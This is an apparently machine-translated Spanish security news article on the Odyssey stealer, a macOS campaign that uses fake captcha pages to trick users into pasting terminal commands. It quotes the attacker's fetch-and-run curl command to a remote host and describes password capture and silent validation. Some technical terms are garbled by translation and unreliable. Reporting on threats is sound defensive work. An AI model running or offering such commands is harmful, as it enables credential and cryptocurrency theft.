Ha surgido una nueva y sofisticada campaña de malware dirigida a los usuarios de MacOS, empleando tácticas engañosas de “ClickFix” para distribuir AppleScripts maliciosos diseñados para cosechar credenciales de usuario y datos financieros confidenciales.
La campaña aprovecha los dominios tipográficos que imitan estrechamente las plataformas de finanzas legítimas y los sitios web de Apple App Store, creando una fachada convincente que engaña a los usuarios para ejecutar comandos peligrosos en sus sistemas.
El ataque comienza cuando los usuarios visitan inadvertidamente dominios maliciosos que presentan falsas indicaciones de captcha estilo CloudFlare.
Estas páginas de verificación aparentemente legítimas indican a los usuarios de MacOS que copien y pegan comandos codificados en Base64 en sus aplicaciones terminales para demostrar que no son robots.
Una vez ejecutados, estos comandos inician una operación integral de robo de datos que se dirige a las credenciales del navegador, las billeteras de criptomonedas y la información personal confidencial almacenada en múltiples aplicaciones.
Investigadores de Cyfirma identificado Este malware como el robador de Odyssey, una versión renombrada del robador de Poseidón anteriormente conocido que se originó como una bifurcación del robador de AMOS.
El equipo de investigación descubrió múltiples paneles de comando y control vinculados a esta actividad, con infraestructura principalmente organizada en Rusia.
El malware demuestra una clara preferencia por dirigir a los usuarios en los países occidentales, particularmente a los Estados Unidos y la Unión Europea, mientras evita notablemente a las víctimas en la Commonwealth de las naciones estados independientes.
El robador de Odyssey representa una evolución preocupante en el malware dirigido por macOS, que combina tácticas de ingeniería social con capacidades técnicas sofisticadas.
A diferencia del malware tradicional que se basa en las vulnerabilidades de software, esta campaña explota la psicología humana al presentar a los usuarios indicaciones de seguridad de aspecto familiar que parecen ser procedimientos de verificación de rutina.
Los atacantes han creado cuidadosamente sus sitios web de distribución para reflejar plataformas de confianza, lo que hace que la detección sea particularmente desafiante para los usuarios desprevenidos.
Mecanismo de infección y ejecución de la carga útil
El mecanismo de infección del malware se basa en un proceso de múltiples etapas que comienza con el tipo de escritura de dominio y culmina en el compromiso integral del sistema.
Flujo de distribución de ClickFix (fuente – Cyfirma)
Cuando los usuarios visitan los dominios maliciosos, se encuentran con páginas diseñadas profesionalmente que replican la apariencia de sistemas legítimos de verificación Captcha.
El mensaje falso muestra instrucciones para que los usuarios de MacOS ejecuten un comando que aparezca de la siguiente manera:-
curl -s http://odyssey1.to:3333/d?u=october | mierda
Este comando recupera y ejecuta un AppleScript desde el servidor de comando y control del atacante. El script emplea la ofuscación alfanumérica para ocultar los nombres de las funciones, aunque el análisis revela su verdadero propósito.
Tras la ejecución, el malware crea una estructura de directorio temporal utilizando el comando mkdir, estableciendo específicamente /tmp /lovemrtrump como su base operativa.
El AppleScript luego muestra un mensaje de autenticación convincente diseñado para capturar la contraseña del sistema del usuario.
Para validar las credenciales robadas en silencio, aprovecha el comando MACOS DSCL con el parámetro AyTonly, asegurando que el proceso de verificación permanezca oculto al usuario.
Esta técnica permite que el malware confirme la validez de la contraseña sin activar alertas del sistema o sospechas del usuario, lo que demuestra la comprensión profunda de los atacantes de los mecanismos de seguridad de MacOS.
Investigue el comportamiento de malware en vivo, rastree cada paso de un ataque y tome decisiones de seguridad más rápidas y inteligentes -> Prueba cualquiera.
